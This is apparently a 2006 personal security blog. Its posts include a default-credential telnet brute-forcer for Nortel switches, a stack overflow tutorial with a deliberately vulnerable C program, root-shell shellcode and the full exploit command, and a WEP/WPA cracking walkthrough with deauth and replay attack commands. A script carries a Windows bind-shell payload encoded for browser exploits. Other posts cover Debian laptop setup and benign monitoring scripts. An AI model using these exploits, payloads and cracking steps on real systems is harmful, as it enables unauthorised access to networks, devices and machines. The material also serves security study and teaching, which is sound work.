
perl -e 'use Pex;print Pex::Text::PatternCreate(20)'

or below is a little perl script that you can just run with 24 as the input. Ya I'm that lazy!

#pex_pattern.pl
#!/usr/bin/perl

#path to Pex lib in metasploit

use lib "/home/kpan1c/framework-2.6/lib/";
use Pex;

print Pex::Text::PatternCreate(@ARGV[0]). "\n";

./pex_pattern.pl 24

Output will look like so
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7

Now you can just overflow the app with that string and then check EIP or whatever you wanted to overwrite. Once you see what is in it you can pass that string to patternoffset.pl located in the sdk dir of metasploit followed by the length of your pattern and bam you got an offset. Handy, and to think I use to create patterns like AAAABBBBCCCC......

./patternOffset.pl 0x35614134 24

References:
http://metasploit.com
http://www.syngress.com/catalog/?pid=3270

Nortel-Defaults.pl

2006-11-08T15:57:00.001-06:00

Well I wrote this a while ago for discovering default username and passwords on Nortel switches. It pretty much can be used for any telnet type device, although I think Cisco may need some more sleep()'s. I know its a dirty script, I needed it fast and figured why not post it. You can change the arrary of user/pass and/or have it go at different subnets and/or change where the switches are and/or scan every ip for a switch. In my case I knew the the octects of the switchs on every subnet.

######################################################################

#!/usr/bin/perl

use	Net::Telnet;


#Nortels default username/passwords
@norteldefault = ('rwa','rw','ro','l3','l2','l1','operator','slbop','slbadmin');

#all switches ip
$top=254;
$bot=126;

#gernerate hosts to test
for($a= 1; $a < 100; $a++){

#creat host for every class we want to scan and push on array
#just comment out blocks you dont want to scan or add more

#192.168.*.1,253
#$temp ="192.1.".$a.".".$top;
#push @hosts,$temp;
#$temp ="192.168.".$a.".".$bot;
#push @hosts,$temp;

#192.1.*.1,253
#$temp ="192.1.".$a.".".$top;
#push @hosts,$temp;
#$temp ="192.1.".$a.".".$bot;
#push @hosts,$temp;


#10.10.*.1,253
$temp ="10.10.".$a.".".$top;
push @hosts,$temp;
$temp ="10.10.".$a.".".$bot;
push @hosts,$temp;
}


#setup telnet
$telnet = new Net::Telnet (Timeout => 3, Errmode => "return");


#main loop to do the fun
foreach $host (@hosts){
	chomp $host;
	if($telnet-> open($host)){
		print "\nConnected to $host";


		foreach $userpass (@norteldefault) {
			chomp $userpass;
			$user = $userpass;
			$pass = %userpass;
			&login;
			sleep (30);	
		};
	}
	else{print "\nCould Not Connect To $host"}
};

####old testing 
#sub conn{
#
#$telnet = new Net::Telnet (Timeout => 3, Errmode => "return");
#if($telnet-> open($host)){
#	$connect=1;
#	&login;
#}
#};

sub login{
print "\nTrying To login with $userpass";
print "\nWaiting 30sec before next guess. prevent susp. and lockouts";
if($telnet -> login($userpass,$userpass)){
	print "\nLogged In With $userpass To $host !!!!";
	print "\nThis has been logged to File!!!!";
}
$telnet -> close;
};

#######################################################################

Reference:
http://search.cpan.org/~jrogers/Net-Telnet-3.03/lib/Net/Telnet.pm

Simple Local Stack Overflow

2006-08-12T16:32:00.001-05:00



This is just a beginning document on stack overflows. 
If anyone wants to begin to learn about overflows, this is a good place to start. 
This example is done on Linux x86. So lets get started.

First off, if you have a 2.6 kernel you may have Arjan van de Ven's address space 
randomization patch. This will cause the stack to begin at a random location. 
If you want to find out more information on this check out or google.

http://lwn.net/Articles/121845/

To make things easier for now, lets turn it off.
You can check to see if its on with the following command.

cat /proc/sys/kernel/randomize_va_space
If you get a “1” its on, a “0” means its not. To turn off do the following.

echo 0 > /proc/sys/kernel/randomize_va_space

Ok, now thats off lets make sure we enable core dumps.  
If we were to run the program within gdb we don't really need core dumps but 
it does make it a bit easier with them. To enable, invoke the following.

ulimit -c unlimited

Lets start with a small vulnerable program.

----------------------------vuln.c----------------------------
#include stdio.h //dont forget brackets.couldnt use in post

int main(int argc, char * argv[])
{

char buf[10];

if(argc < 2){
printf("usage : %s buffer\n", argv[0]);
exit(0);
}

strcpy(buf,argv[1]);
printf("sent to buffer : %s \n", buf);

}
----------------------------vuln.c----------------------------

As you can see its a very small program that takes user input and copies it 
with strcpy() unchecked. It only has a buffer of 10 which doesn't take much 
to overflow. So now lets compile and run.

gcc vuln.c -o vul

./vuln
Usage : ./vuln buffer

./vuln AAAAA
sent to buffer: AAAAA

Now lets get a segmentation fault.  A seg fault is basically the OS telling 
the program it is trying to access VMA(Virtual Memory Address) that it does 
not have access to.


./vuln AAAAAAAAAAAAAAAA
sent to buffer : AAAAAAAAAAAAAAAA 
Segmentation fault (core dumped)

We just overflowed the the buffer with 16 “A”'s. Lets take a look in GDB.

gdb -c core ./vuln

Core was generated by `./vuln AAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0  0xa7004141 in ?? ()
(gdb) info register $ebp
ebp            0x41414141       0x41414141
(gdb) i r  $eip
eip            0xa7004141       0xa7004141
(gdb)


As you can see we overwrote ebp(Extended Base Pointer) with 0x41414141 which is 
“AAAA” but we did not fully overwrite eip(Extended Instruction Pointer).
We want to control eip so we can control the flow of the program. 
So lets try it again with some more “A”'s. 

Note: some versions of gcc will actually allocate more memory for the buffer , 
so you may need more to fill. This is just in my case. 

We will do this using perl.

./vuln `perl -e 'print "A" x 20'`
Now look at $ebp and $eip in GDB. We have successfully overwritten both with “A”'s.
(gdb) i r $eip
eip            0x41414141       0x41414141
(gdb) i r $ebp
ebp            0x41414141       0x41414141
(gdb)q 


Now we can control the flow of the program. What we want to do is overwrite $eip 
with an address of our choice. Pointing it to something a bit more useful, 
like some shellcode to drop us a shell. Since this is just a local exploit 
and the buffer is not that big to store a shell we can write a simple eggshell 
to load into memory. 

Below is a small eggshell.

-------------------------------eggshell.c-------------------------------
#include stdio.h //dont forget brackets again
#define NOP 0x90 /* nops , we want to land here */

char shellcode[] =
  "\x6a\x17"                      // push $0x17
  "\x58"                        // pop  %eax
  "\x31\xdb"                    // xor  %ebx, %ebx
  "\xcd\x80"                    // int  $0x80

  "\x31\xd2"                    // xor  %edx, %edx  
  "\x6a\x0b"                    // push $0xb
  "\x58"                        // pop  %eax
  "\x52"                        // push %edx
  "\x68\x2f\x2f\x73\x68"        // push $0x68732f2f
  "\x68\x2f\x62\x69\x6e"        // push $0x6e69622f
  "\x89\xe3"                    // mov  %esp, %ebx
  "\x52"                        // push %edx
  "\x53"                        // push %ebx
  "\x89\xe1"                    // mov  %esp, %ecx
  "\xcd\x80";                   // int  $0x80

/* This is not my shell code , I got it from milw0rm.com.
Its  setuid(0) + execve("/bin/sh", ["/bin/sh", NULL])
http://www.milw0rm.com/shellcode/1637
*/

int main(void)
{
char egg[512];
puts("loaded eggshell into env");
memset(egg,NOP,512);
memcpy(&egg[512-strlen(shellcode)],shellcode,strlen(shellcode));
setenv("EGG", egg, 1);
putenv(egg);
system("/bin/bash");
return(0);
}
-------------------------------eggshell.c-------------------------------


Now we can compile and load the eggshell.

gcc eggshell.c -o eggshell
./eggshell


Now lets see where we want to point eip to. We want to look for our nopsled we 
created/loaded with our eggshell. The  eggshell loaded the nops + shellcode 
into memory. To find the landing point in memory we turn to gdb again.

gdb -c core ./vuln

(gdb) x/s $esp  //x is short for examine do a “help examine” to find out more 
0xaffff6d0:      "AA"
(gdb) 
0xaffff6d3:      ""
(gdb) 
0xaffff6d4:      "D÷ÿ¯P÷ÿ¯\001"
(gdb) 
..........We keep hitting enter until we see the following........
0xaffff8f2:      "EGG=", '\220' ...
(gdb) 
0xaffff9ba:      '\220' ... //This is where we want to land!
(gdb) 

So 0xaffff9ba is our address to slide down our nops into our shellcode. 
This is what we want to overwrite $eip with. If you wanted to see the whole egg you could do 
something like the following.

echo -n $EGG |hexdump -Cv

00000000  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000010  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000020  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000030  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000040  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000050  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000060  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000070  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000080  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000090  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
000000a0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
000000b0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
000000c0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
000000d0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
000000e0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
000000f0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000100  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000110  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000120  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000130  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000140  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000150  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000160  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000170  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000180  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000190  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
000001a0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
000001b0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
000001c0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
000001d0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
000001e0  90 6a 17 58 31 db cd 80  31 d2 6a 0b 58 52 68 2f  |.j.X1ÛÍ.1Òj.XRh/|
000001f0  2f 73 68 68 2f 62 69 6e  89 e3 52 53 89 e1 cd 80  |/shh/bin.ãRS.áÍ.|
00000200  f4 2f fd a7                                       |ô/ý§|
00000204


See all of our nops followed by the shellcode?

We now have the address we want to overwrite $eip with. Lets assume we didn't 
know the buffer was only [10] , since we only overwrote it with “A”'s there 
really know way of telling what our offset is. Offset would be your buffer 
minus the address of eip. 

You could do something like so:

perl -e 'print “A”x4 . “B”x4 .”C”x4' and so on....... 

Then you could see what letter actually overwrote eip. We could then calculate the 
offset and just add the eip to it. But thats not to practical
(well for this example its not bad). 
So this is where we turn to metasploit.
 
Metasploit has an nice little perl PatternCreate() function to create a pattern of 
unique 4 byte output. This way we can easily calculate where we overwrote $eip and 
then find our offset. So earlier we know we overwrote $eip with 20 “A”'s. 
Lets create a 20 line string which is unique every 4 bytes. 
The module is located in ~/framework/lib.

perl -e 'use Pex;print Pex::Text::PatternCreate(20)'
Aa0Aa1Aa2Aa3Aa4Aa5Aa

Now lets overflow our vuln.c with that pattern.

./vuln Aa0Aa1Aa2Aa3Aa4Aa5Aa
sent to buffer : Aa0Aa1Aa2Aa3Aa4Aa5Aa 
Segmentation fault (core dumped)

Now lets see what is in $eip. 

(gdb) i r $eip 
eip            0x35614134       0x35614134
(gdb) q

Now metasploit even makes it easier to calculate our offset with the help of 
PatteronOffset.pl located in ~/framework/sdk

We pass it the big-endian address in EIP(which is 0x35614134) 
then the size of our pattern(which is 20). Lets try it out.
 
./patternOffset.pl 0x35614134 20
14

So 14 is our offset! We now know our offset and the address to our shellcode.  
What we want to pass to our vuln.c is 14 chars + our address to the 
shellcode(4 bytes). Which makes it overwrite the $eip pointing to our shellcode.

Since 0xaffff8f2(address to shellcode) is in big-endian and we are on little-endian(x86 architecture) 
we will have to convert the address to little-endian. To do this we break up 
the address in 2 bytes, drop the “0x” and then reverse it. Like so:

af ff f8 f2          //which equals
\xf2\xf8\xff\xaf    //we add the \x so it won't interpret it as ASCII

Now want to send our vuln.c 14 “A”'s + \xf2\xf8\xff\xaf  

./vuln `perl -e 'print "A" x 14'``printf "\xf2\xf8\xff\xaf"`

There we exploited a nice little buffer. You should be in a different shell. 
If you type exit you will go back to your original. If you want better results 
play around with the shellcode. You can find more at milw0rm.com, or write your own.

If anyone sees something I could do better or anything wrong please tell me. 
I would be happy to hear. Or even if you got questions please feel free to ask.
This was just to get you started in overlflows.


Here is my crappy little ASCI art of Virtual Memory, to help visualize it. 
I stole the diagram from a the “Intro To Shellcoding” pdf referenced below.

-----------------------------------------------------------------------------------------
|Shared	        | .text	     | .bss    	| <-------------------------stack	| argc,	|
|Libraries	| _start:    | and     	|              char buf[10][ebp][eip]  	| argv,	|
| 		|	     | heap	|					| envp	|
|		|            |		|					|	|
-----------------------------------------------------------------------------------------

Direction -------------->

- .text segment is the program entry point.
- .bss holds uninitialized data that was declared in the program.
- heap is where the program used malloc().
- stack is at the top of the memory
- arg's is the programs arguments set up by the OS.

References:
http://www.milw0rm.com
http://www.rootsecure.net/content/downloads/pdf/intro_to_shellcoding.pdf>
http://insecure.org/stf/smashstack.txt

Past Defcon Pictures

2006-08-11T12:35:00.000-05:00

Past Defcons

defcon 14

2006-08-11T12:01:00.000-05:00

defcon14

Cracking WEP / WPA-PSK

2006-07-28T09:44:00.001-05:00

Ok, I know there are tons of docs out there on this and it has been done a million times. This is just for my personal reference. I always knew WEP was insecure, I just never did anything about it (found it boring). So on one bored night I decided to find out how long it would take to break into my MAC Filtering/ WEP 128 Bit key network. It took about 1 hour to gather all the IV’s I needed and to crack the key. So here’s how to do it.

First you need aircrack.
http://www.aircrack-ng.org

I will usually find the network I want to attack using Kismet. Then let the fun begin.
Now we can startup airodump-ng to capture all the stuff we need.

airodump-ng -w wepcrack -c 1 wlan0

To save headaches of MAC filtering lets just spoof our MAC to a client that is already connected or one you know is allowed.
(If nobody is connected and MAC filtering is enabled, you are kind of out of luck)

ifconfig wlan0 down
ifconfig wlan0 hw ether FF:31:13:3F:44:55 (client MAC)
ifconfig wlan0 up

There much better, MAC filtering is defeated.

Ok now we are capturing the data with airodump, lets inject some traffic and generate some IV’s. In airodump the data column is the IV’s. For a 64 bit key you need around 300,000 and about 1 million for 128 bit key. But this will vary. On to the injection.

Here is a common ARP-request replay attack, which works pretty well.

Aireplay-ng –3 –b 00:14:BF:18:9F:88 (bssid of AP) -h FF:31:13:3F:44:55 (client) wlan0

You may have to wait a while for the first ARP request to be seen, but once it gets a couple its all down hill from there.

Aireplay-ng will look like below when running.

Saving ARP requests in replay_arp-0727-12134.cap
You must also start airodump to capture replies.
Read 3643 packets (got 3 ARP requests), sent 2537 packets...

Note: If you cannot get any ARP requests, sometimes doing a de-auth on the client will sometimes generate some traffic for you. It is done like below.
(If you want to DOS the client just change the 20 to a 0, this will make it loop rather then run 20 times)

Aireplay-ng –0 20 –a 00:14:BF:18:9F:88 (bssid of AP) –c FF:31:13:3F:44:55 (client) wlan0

Now you have an ARP and are replaying traffic. Now just wait for the IV’s to come in.
Once you have enough IV’s lets crack the .cap file.

At a basic level you can just run it like below. By default it tries to crack a 128 bit key. Sometimes its best to start with a 64 bit key and work your way up. Its all up to you.

aircrack-ng [options] capture_file

Sometimes you will have to play with some options depending on the key. Please refer to aircrack’s site for more explanation. It is very straightforward.

http://www.aircrack-ng.org/doku.php?id=aircrack-ng

That’s it ! Key is broken. Now I will quickly go through WPA-PSK. Basically, the only way I found to attack it is a dictionary attack against the PSK.

The goal here is to capture the 4-way handshake. So do the de-auth as described above to cause the client to deauth and reconnect in hopes of catching the 4-way handshake. Sometimes this will take multiple tries to catch it. What I do is just keep on running aircrack against the active dump file to see if I got a handshake or not.
(You can also run ethereal on the file to see exactly what the handshake looks like just filter by EAPOL)

Once you got it. You can stop capturing traffic.

Now you can run aircrack with the WPA option and point it to your dictionary file. But I had troubles passing my very big dictionary file to it. So I then turned to cowpatty. Very straightforward, run it to see available options.

http://sourceforge.net/projects/cowpatty

Key found! Well I cheated a bit and put my PSK in the middle of the dictionary file.

This basically says that when using WPA-PSK, please people use a very good password. Something that will not be found in a normal dictionary file.

Well pretty simple huh? Almost to simple. Don't need to much brains for this attack.

I am now starting to try to inject traffic with scapy. So if anyone has generated arp’s to wifi with it I would be interested to hear.

Refereneces:
http://sourceforge.net/projects/cowpatty
http://www.aircrack-ng.org/doku.php

Installing Debian on Dell Latitude D510

2006-05-16T15:04:00.001-05:00

Well just got one of these things from work. Kind of stinks because my IBM A31 played so nice with linux. So I'm writing this to document this long proces and hopefully someone else doesn't have to reinstall a million times while pulling all their hair out.

First of all booting with the debian-installer with the option “linux26” will not work. These drives are SATA, and the kernel used under that option does not pick it up. So download the stable CD and install it with default options giving you the 2.4 kernel. The 2.4 kernel will pick up the sata as IDE. Ok now we have a base “stable” debian system.

Step 1 (get testing packages):
Add testing to your sources.list (I always add after main - contrib & non-free, that’s your call)

* apt-get update
* apt-get dist-upgrade - This is optional, you can stay on stable if you want or just do it later.

Note:
If you do the dist-upgrade use xserver-xorg for your xserver this has support for the video card “i810”
If you stay on Xfree86 you can use the “vesa” driver but you will not get direct rendering.

Step 2 (install/boot 2.6 kernel):
At the time of writing this, 2.6.15 was new and had built-in support for ipw2200, so that’s what I went with.

* apt-get install linux-image-2.6.15-1-686

Now we have to change some things to point to sda.

Change in /boot/grub/menu.lst
* search for kopt and change to sda
* look for the section the kernel boots and change to sda

Change /boot/grub/device.map
* change the hdc to sda

Change in /etc/fstab
* change the hd’s sd’s
* change the cdrom scd0 (this will be used later)

Step 3 (Get scd0/CDROM working):
We will have to recompile the kernel for this one. So grab the source.
If you have not already you will need to install kernel-package for this way.
You can always comipile the kernel your own way too.

* apt-get install linux-source-2.6.15
* extract kernel in /usr/src and make ln –s linux kernel-source-dir
* now copy current kernel config from /boot/ to /usr/src/linux/.config

You can make other changes but I’m just showing the one for the sata cdrom.

* edit /usr/src/linux/drivers/scsi/libata-core.c and change int atapi_enabled = 0 to =1

Now we compile
* make oldconfig
* make-kpkg --initrd --append-to-version="-devin_ertel_rocks" kernel_image <--hope you dont cp/paste :>

Now install it and boot it. Then mount a cd! You can get rid of your other kernels if you like.

Step 4 (Built-in Wireless – IPW2200):

Since ipw2200 is built in to 2.6.15 all we have to do is drop the firmware in /lib/firmware.
Or you just look in /etc/hotplug/firmware.agent to see where hotplug looks for firmware.

* Download the ipw2200 firmware (at the time I needed 2.4, maybe different now)

http://ipw2200.sourceforge.net/

* Extract it into /lib/firmware

Step 5 (resolution and direct rendering):

Now you will have to do a dist-upgrade for this to work correctly. Not sure what package gets direct rendering (xlibs, new xorg???) but this is the only way it worked for me.

Note:
It does get a better FPS in glxgears and looks a lot crisper but really does not seem to be the
resolution I set. So if anyone sees something I am doing wrong or has other ideas I would love to
hear them.

* apt-get install 915resolution (you can read more about what this does from the links below)
* set your /etc/defaults/915resolution - set how you like(below is how I did it)

MODE=3c
XRESO=1400
YRESO=1050
BIT=32

* /etc/init.d/915resolution start
* edit /etc/X11/xorg.conf
* change your driver to i810 if you haven’t already
* change your screen to 1400x1050
* restart X

Step 6 (Touchpad Driver/Synapatics):
Well I never really liked touchpads, and with the default pointer driver it was terrible in enlightenment(not as bad in gnome).

* Install x-dev, libx11-dev and libxext-dev
* Download The Synapatics driver.
http://freshmeat.net/projects/synaptics/

* extract and make install
* then just follow the instructions in the INSTALL file.

Note:
I changed the speed, it was way to slow at first.
Also, for some reason I would loose the mouse after undocking. To fix this I changed the "ServerLayout" like so:

Section "ServerLayout"
InputDevice "Synaptics Mouse" "AlwaysCore"

* also make the change in the device section

Step 7 (ACPID/lidbtn):
Everytime I would close the lid, it would go either to sleep or standby and it would not recover. So to fix this I configured acpid to just blank the screen.
So add the files below to /etc/acpi. You will need vbetool, this is how I blank the screen.
There is a lot more you can do with acpid but this was the big one for me.

/etc/acpi/lidbtn.sh <--make this +x

-------------------------------------------------------
#!/bin/sh
# /etc/acpi/lidbtn.sh
grep 'open' /proc/acpi/button/lid/LID/state >/dev/null

if [ "x$?" == "x0" ]; then
/usr/sbin/vbetool dpms on
else
/usr/sbin/vbetool dpms off
fi
--------------------------------------------------------

and

/etc/acpi/events/lidbtn

----------------------------
#/etc/acpi/events/lidbtn

event=button[ /]lid
action=/etc/acpi/lidbtn.sh

----------------------------

* Now restart acpid /etc/init.d/acpid restart

Other Things To Do:
* Still would like to get the LED for the wireless to work. I found when compiled into the kernel it was a little to buggy.

* Would like to get ipw2200 in monitor mode. I tried to compile this in,
CONFIG_IPW2200_MONITOR=y but it kept removing it. It seems like newer kernel versions in debian will be enabled. Just like the IPW2100. Any ideas , again would love to hear.

* Get the function keys working good. There is a package called i8kutils , but I have not had much luck with that. I may look into acpi to handle this.

References:
http://ipw2200.sourceforge.net/
http://asl.epfl.ch/~kolski/d505.html
http://www-inf.int-evry.fr/~olberger/weblog/2005/08/24/debian-gnulinux-on-a-dell-latitude-d510-laptop/
http://alpha.uhasselt.be/Research/Algebra/Members/D505.html
http://perso.wanadoo.fr/apoirier/
http://lists.debian.org/debian-kernel/2006/03/msg00614.html
http://clx.digi.com.br/wiki/bin/view/Personal/DellLatitude110L
http://csd.informatik.uni-oldenburg.de/~eagle/acpid.html#sec-4

Monitor Web w/ googs.pl

2006-05-11T14:01:00.001-05:00

I wanted a way to monitor the web for certain terms(i.e. leaked info on a company). For example, being able to have an arrary of search terms and operators to query aganist, and then email me a nice little html report. This is the reason for googs.pl.

I used google API to do the querys. I also (although not sure how well it works) append the google operator daterange: which needs the julian date, thus hoping to only return new results that day and only email me if it does find new ones. This way I don't have to look at old stuff all the time or get tons of email. You can comment that feature out if you dont want it. To figure the date I used the perl module Cal::Date which I posted a link below. Then I just set it up in a cronjob to run everyday.


# Devin Ertel
# googs.pl
# 
#!/usr/bin/perl

use strict;     
use SOAP::Lite;
use MIME::Lite;
use Net::SMTP;
use Cal::Date qw(DJM MJD today);

#Get Todays Date
my $date = today();

#convert to julian
my $jul_today= DJM($date);

#Put Your Google API Key Here
my $google_key='your_google_key_here';
     
#Google WSDL File Location
my $google_wsdl = "./GoogleSearch.wsdl";
 
#Put querys here, escape any "'s with \" 
my $query;
my @query = ("company + hacking",
	     "allintext:company + hacking",
             "your querys"
	     );
  

#assign current julian date to query
my $goog_daterange = " + daterange:".$jul_today."-".$jul_today;

#SOAP::Lite instance with GoogleSearch.wsdl.
my $google_soap = SOAP::Lite->service("file:$google_wsdl");
     

#Set Up Mail Vars
my $faddy = 'from_address@blah.com';
my $taddy = 'to_address@blah.com';
my $mail_host = 'your_mail_host';

my $subject = "New Information Posted!";
my $msg_body ="";

#Its Google Time

#Loop Through Array of Querys
foreach $query (@query){
	
	#add daterange: operator to curren query
	my $query_date=$query.$goog_daterange;
	
	my $results = $google_soap -> 
    		doGoogleSearch(
      			$google_key, $query_date , 0, 10, "false", "",  "false",
      			"", "latin1", "latin1"
    		);
	
	# Exit On No Results
	@{$results->{resultElements}} or exit;
     
	# Loop Results and Output to HTML
	foreach my $result (@{$results->{resultElements}}) {
        
        #had to take brackets out for this post for the html breaks and lines
	$msg_body .= "br".
  		      $result->{'title'}."br".
  		      "a href=".$result->{URL}.">".$result->{URL}."/a br".
  		      $result->{snippet}.
		      "
hr";
  		     
	}
}
#Setup Message

my $msg=MIME::Lite->new (
        From => $faddy,
        To => $taddy,
        Subject => $subject,
	Type => 'TEXT/HTML',
	Encoding => 'quoted-printable',
	Data => $msg_body,
)       or die "Could Not Create Msg: $!\n";


#Send Message
MIME::Lite->send('smtp', $mail_host, Timeout=>60);
$msg->send;

References:
http://freshmeat.net/projects/caldate/
http://www.google.com/apis/
http://search.cpan.org/~yves/MIME-Lite-3.01/lib/MIME/Lite.pm

JSUnescape.pl

2006-03-30T10:13:00.001-06:00

With all of the recent browser exploits, I wanted an easy way to encode my shellcode. Now this is not polished by any means and I took the function that encodes it(so don't give me any credit). It was actually developed by Aviv Raff and H D Moore from the Mozilla_Compareto exploit.

Some improvements I would like to do is make the encoded shellcode output a little cleaner and I would like to read the shellcode from a file. As it stands now you have to copy your shellcode into the perl script as a var.

So to do this, write your shellcode or just go to
http://metasploit.com:55555/PAYLOADS
and pick the payload you would want to use. paste into the perl script. (below example is a w32_Bind payload)

#! /usr/local/bin/perl
use strict;

#paste your shellcode below
my $shellcode=
"\x2b\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7f".
"\x3c\x79\x76\x83\xeb\xfc\xe2\xf4\x97\x6a\x79\x76\x7f\x6f\x2c\x20".
"\x28\xb7\x15\x52\x67\xb7\x3c\x4a\xf4\x68\x7c\x0e\x7e\xd6\xf2\x3c".
"\x67\xb7\x23\x56\x7e\xd7\x9a\x44\x36\xb7\x4d\xfd\x7e\xd2\x48\x89".
"\x83\x0d\xb9\xda\x47\xdc\x0d\x71\xbe\xf3\x74\x77\xb8\xd7\x8b\x4d".
"\x03\x18\x6d\x03\x9e\xb7\x23\x52\x7e\xd7\x1f\xfd\x73\x77\xf2\x2c".
"\x63\x3d\x92\xfd\x7b\xb7\x78\x9e\x94\x3e\x48\xb6\x20\x62\x24\x2d".
"\xbd\x34\x79\x28\x15\x0c\x20\x12\xf4\x25\xf2\x2d\x73\xb7\x22\x6a".
"\xf4\x27\xf2\x2d\x77\x6f\x11\xf8\x31\x32\x95\x89\xa9\xb5\xbe\xf7".
"\x93\x3c\x78\x76\x7f\x6b\x2f\x25\xf6\xd9\x91\x51\x7f\x3c\x79\xe6".
"\x7e\x3c\x79\xc0\x66\x24\x9e\xd2\x66\x4c\x90\x93\x36\xba\x30\xd2".
"\x65\x4c\xbe\xd2\xd2\x12\x90\xaf\x76\xc9\xd4\xbd\x92\xc0\x42\x21".
"\x2c\x0e\x26\x45\x4d\x3c\x22\xfb\x34\x1c\x28\x89\xa8\xb5\xa6\xff".
"\xbc\xb1\x0c\x62\x15\x3b\x20\x27\x2c\xc3\x4d\xf9\x80\x69\x7d\x2f".
"\xf6\x38\xf7\x94\x8d\x17\x5e\x22\x80\x0b\x86\x23\x4f\x0d\xb9\x26".
"\x2f\x6c\x29\x36\x2f\x7c\x29\x89\x2a\x10\xf0\xb1\x4e\xe7\x2a\x25".
"\x17\x3e\x79\x67\x23\xb5\x99\x1c\x6f\x6c\x2e\x89\x2a\x18\x2a\x21".
"\x80\x69\x51\x25\x2b\x6b\x86\x23\x5f\xb5\xbe\xf7\x93\x3c\x69\x76".
"\x7f\xb5\x9a\x1c\x7f\x54\x79\x66\x7f\x3c\x2a\x21\x80\x69\x61\xf7".
"\x93\x3c\x7d\x76\x7f\xc3\xaa\x76";

JSUnescape($shellcode);

sub JSUnescape #Taken from Mozilla_Compareto by Aviv Raff and H D Moore
{
my $data = shift;
my $code = '';

# Encode the shellcode via %u sequences for JS's unescape() function
my $idx = 0;
while ($idx < length($data) - 1) {
my $c1 = ord(substr($data, $idx, 1));
my $c2 = ord(substr($data, $idx+1, 1));
$code .= sprintf('%%u%.2x%.2x', $c2, $c1);
$idx += 2;
}

print "\n" . $code . "\n";
}

Output should look like the following. All ready for unescape()!

uc92b%ue983%ud9b8%ud9ee%u2474%u5bf4%u7381%u7f13%u793c%u8376%ufceb%uf4e2%u6a97%u7679%u6f7f%u202c%ub728%u5215%ub767%u4a3c%u68f4%u0e7c%ud67e%u3cf2%ub767%u5623%ud77e%u449a%ub736%ufd4d%ud27e%u8948%u0d83%udab9%udc47%u710d%uf3be%u7774%ud7b8%u4d8b%u1803%u036d%ub79e%u5223%ud77e%ufd1f%u7773%u2cf2%u3d63%ufd92%ub77b%u9e78%u3e94%ub648%u6220%u2d24%u34bd%u2879%u0c15%u1220%u25f4%u2df2%ub773%u6a22%u27f4%u2df2%u6f77%uf811%u3231%u8995%ub5a9%uf7be%u3c93%u7678%u6b7f%u252f%ud9f6%u5191%u3c7f%ue679%u3c7e%uc079%u2466%ud29e%u4c66%u9390%uba36%ud230%u4c65%ud2be%u12d2%uaf90%uc976%ubdd4%uc092%u2142%u0e2c%u4526%u3c4d%ufb22%u1c34%u8928%ub5a8%uffa6%ub1bc%u620c%u3b15%u2720%uc32c%uf94d%u6980%u2f7d%u38f6%u94f7%u178d%u225e%u0b80%u2386%u0d4f%u26b9%u6c2f%u3629%u7c2f%u8929%u102a%ub1f0%ue74e%u252a%u3e17%u6779%ub523%u1c99%u6c6f%u892e%u182a%u212a%u6980%u2551%u6b2b%u2386%ub55f%uf7be%u3c93%u7669%ub57f%u1c9a%u547f%u6679%u3c7f%u212a%u6980%uf761%u3c93%u767d%uc37f%u76aa

webserv-naslgrab.nasl

2006-01-11T11:22:00.001-06:00

Well I wanted to get a bit more familiar with NASL (Nessus Attack Scripting Language). I've modified nessus plugins in the past but never really did much with it. I have to say I do like it, pretty easy to do testing with.

I needed a way to check a lot of webservers for their versions, and fast. So figured what the heck let me throw something together with NASL. Now this is just a stand-alone script, it will not work within the nessus framework.
(More docs to work with nessus framework are below)

This just sends a HEAD request to the webserver and greps for the server string.

This also could be easly modified to read from the socket and grab other banners. I found this would work for telnet, ftp ,ssh, etc. but for some reason I could not grab the banner from the webservers I was testing. Hence sending
"HEAD / HTTP/1.0\r\n\r\n"

If you wanted to read right from the socket without sending the HEAD command you could just comment that out and replace name w/ server.

I will be looking into this more, but this was just a quick script to get my feet wet.

#####################################################################
# Name: webserv-naslgrab.nasl #
# Description: A non-intrusive way to grab the web server version #
# by sending opening a socket to 80 and sending a #
# HEAD Request. This can be modified to use other #
# ports. #
# Version: .1 #
# Author : Devin Ertel #
# Usage : nasl -t 192.168.1-155 webserv-naslgrab.nasl #
#####################################################################

#Create tcp socket to port 80
soc = open_sock_tcp(80);

#grab host ip of current box with socket open
hostip=get_host_ip();

#if socket was created
if (soc) {
